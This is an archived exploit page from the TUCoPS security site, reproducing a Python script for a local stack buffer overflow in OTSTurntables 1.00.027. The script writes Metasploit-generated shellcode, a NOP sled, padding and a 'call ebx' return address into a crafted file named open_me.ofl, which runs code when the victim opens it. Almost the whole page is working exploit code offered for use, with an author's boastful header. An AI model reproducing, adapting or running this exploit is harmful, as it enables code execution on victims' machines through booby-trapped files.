TUCoPS :: HP Unsorted O :: va2318.htm

OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit



#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit=0D
#  Discovered & exploited bY suN8Hclf=0D
# crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net=0D 
#  Tested on: Windows XP SP2 Polish Full patched=0D
#  =0D
#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!=0D
#=0D
#  Thanks to Myo and to everyone who knows what hacking really is =0D
#  Not for money dude, only for fun !!!=0D
=0D
print "====================================================================="=0D
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"=0D
print " bY suN8Hclf (crimson.loyd@gmail.com)"=0D 
print "====================================================================="=0D
=0D
nops = "\x90" * 4=0D
ret = "\x75\x52\x46";   # call ebx=0D
=0D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com=0D 
shellcode = (=0D
	"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"=0D
	"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"=0D
	"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"=0D
	"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"=0D
	"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"=0D
	"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"=0D
	"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"=0D
	"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"=0D
	"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"=0D
	"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"=0D
	"\xac\x2c\xc9\x40"=0D
    )=0D
num = 276 - 4 - 160=0D
buff = "\x41" * num=0D
=0D
exploit = nops + shellcode + buff + ret=0D
try:=0D
    out_file = open("open_me.ofl",'w')=0D
    out_file.write(exploit)=0D
    out_file.close()=0D
    raw_input("\nNow open open_me.ofl file to exploit bug!\n")=0D
except:=0D
    print "WTF?"=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH